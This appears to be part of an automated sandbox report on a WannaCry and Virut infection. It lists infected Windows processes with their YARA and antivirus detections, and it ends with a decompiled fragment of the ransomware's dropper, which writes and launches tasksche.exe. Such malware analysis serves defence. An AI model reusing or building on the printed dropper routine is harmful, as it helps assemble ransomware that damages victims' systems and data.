                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team

                  Target ID:10
                  Start time:19:38:16
                  Start date:20/07/2022
                  Path:C:\Windows\System32\fontdrvhost.exe
                  Wow64 process (32bit):false
                  Commandline:fontdrvhost.exe
                  Imagebase:0x7ff646210000
                  File size:790304 bytes
                  MD5 hash:31113981180E69C2773BCADA4051738A
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000002.902190830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000002.902164600.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000000.404780139.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000000.399314141.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000000.404750620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:11
                  Start time:19:38:17
                  Start date:20/07/2022
                  Path:C:\Windows\System32\fontdrvhost.exe
                  Wow64 process (32bit):false
                  Commandline:fontdrvhost.exe
                  Imagebase:0x7ff646210000
                  File size:790304 bytes
                  MD5 hash:31113981180E69C2773BCADA4051738A
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.405766491.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.405750585.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.902186533.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.902526140.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.401684447.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:12
                  Start time:19:38:18
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.407748268.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.902187383.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.902489489.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.405270747.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.407730501.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:13
                  Start time:19:38:19
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.408695665.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.407147003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.902577911.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.902196541.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.408708378.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:14
                  Start time:19:38:23
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k rpcss -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.902198033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.415723694.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.415704475.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.416257871.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.902542043.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.416244851.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:17
                  Start time:19:38:27
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.422292285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.902195963.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.422258384.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.422807100.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.422852544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.902605125.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:18
                  Start time:19:38:28
                  Start date:20/07/2022
                  Path:C:\Windows\System32\dwm.exe
                  Wow64 process (32bit):false
                  Commandline:dwm.exe
                  Imagebase:0x7ff65a250000
                  File size:62464 bytes
                  MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.424968557.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.424980643.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.425355415.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.425337469.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:19
                  Start time:19:38:45
                  Start date:20/07/2022
                  Path:C:\Windows\tasksche.exe
                  Wow64 process (32bit):false
                  Commandline:C:\WINDOWS\tasksche.exe /i
                  Imagebase:0x400000
                  File size:3514368 bytes
                  MD5 hash:3233ACED9279EF54267C479BBA665B90
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000013.00000000.463303050.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 90%, Virustotal
                  • Detection: 85%, Metadefender
                  • Detection: 95%, ReversingLabs

                  Target ID:20
                  Start time:19:38:57
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000014.00000002.902195308.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000014.00000000.487438968.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:21
                  Start time:19:38:58
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):
                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                  Imagebase:
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000002.902195437.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000000.490758156.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:22
                  Start time:19:39:04
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.902191414.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.503757113.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:23
                  Start time:19:39:05
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000002.902194677.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000000.505888524.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:24
                  Start time:19:39:07
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.902194188.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000000.509831563.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:25
                  Start time:19:39:16
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.902194107.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.529226941.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:26
                  Start time:19:39:18
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.902192985.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.532376607.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:27
                  Start time:19:39:19
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000002.902222817.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.536806617.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:28
                  Start time:19:39:21
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001C.00000002.902193202.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001C.00000000.540275578.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:31
                  Start time:19:39:35
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Target ID:32
                  Start time:19:39:36
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s EventSystem
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000000.572101569.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000002.902360653.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:33
                  Start time:19:39:38
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000002.902365047.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000000.575671451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:34
                  Start time:19:39:39
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000000.577790526.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000002.902363987.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:35
                  Start time:19:39:41
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000000.581481544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.902453528.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:36
                  Start time:19:39:42
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s FontCache
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000002.902362977.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000000.584556975.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:37
                  Start time:19:39:44
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000000.588589475.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.902365996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:38
                  Start time:19:39:46
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.902444306.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000000.592851352.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:39
                  Start time:19:39:47
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s nsi
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000000.595649330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000002.902362984.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:40
                  Start time:19:39:49
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000000.599806801.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000002.902434304.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:41
                  Start time:19:39:54
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000002.902364285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000000.610017301.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security


                    Execution Graph

                    Execution Coverage:4.4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:62.9%
                    Total number of Nodes:687
                    Total number of Limit Nodes:11

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00407CE0() {
                    				void _v259;
                    				char _v260;
                    				void _v519;
                    				char _v520;
                    				struct _STARTUPINFOA _v588;
                    				struct _PROCESS_INFORMATION _v604;
                    				long _v608;
                    				_Unknown_base(*)()* _t36;
                    				void* _t38;
                    				void* _t39;
                    				void* _t50;
                    				int _t59;
                    				struct HINSTANCE__* _t104;
                    				struct HRSRC__* _t105;
                    				void* _t107;
                    				void* _t108;
                    				long _t109;
                    				intOrPtr _t121;
                    				intOrPtr _t122;
                    
                    				_t104 = GetModuleHandleW(L"kernel32.dll");
                    				if(_t104 != 0) {
                    					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                    					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                    					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                    					_t36 = GetProcAddress(_t104, "CloseHandle");
                    					 *0x43144c = _t36;
                    					if( *0x431478 != 0) {
                    						_t121 =  *0x431458; // 0x7705f7b0
                    						if(_t121 != 0) {
                    							_t122 =  *0x431460; // 0x7705fc30
                    							if(_t122 != 0 && _t36 != 0) {
                    								_t105 = FindResourceA(0, 0x727, "R");
                    								if(_t105 != 0) {
                    									_t38 = LoadResource(0, _t105);
                    									if(_t38 != 0) {
                    										_t39 = LockResource(_t38);
                    										_v608 = _t39;
                    										if(_t39 != 0) {
                    											_t109 = SizeofResource(0, _t105);
                    											if(_t109 != 0) {
                    												_v520 = 0;
                    												memset( &_v519, 0, 0x40 << 2);
                    												asm("stosw");
                    												asm("stosb");
                    												_v260 = 0;
                    												memset( &_v259, 0, 0x40 << 2);
                    												asm("stosw");
                    												asm("stosb");
                    												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                    												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                    												MoveFileExA( &_v520,  &_v260, 1); // executed
                    												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
                    												_t107 = _t50;
                    												if(_t107 != 0xffffffff) {
                    													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
                    													CloseHandle(_t107);
                    													_v604.hThread = 0;
                    													_v604.dwProcessId = 0;
                    													_v604.dwThreadId = 0;
                    													memset( &(_v588.lpReserved), 0, 0x10 << 2);
                    													asm("repne scasb");
                    													_v604.hProcess = 0;
                    													_t108 = " /i";
                    													asm("repne scasb");
                    													memcpy( &_v520 - 1, _t108, 0 << 2);
                    													memcpy(_t108 + 0x175b75a, _t108, 0);
                    													_v588.cb = 0x44;
                    													_v588.wShowWindow = 0;
                    													_v588.dwFlags = 0x81;
                    													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
                    													if(_t59 != 0) {
                    														CloseHandle(_v604.hThread);
                    														CloseHandle(_v604);
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return 0;
                    			}

                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F75FB10,?,00000000), ref: 00407CEF
                    • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
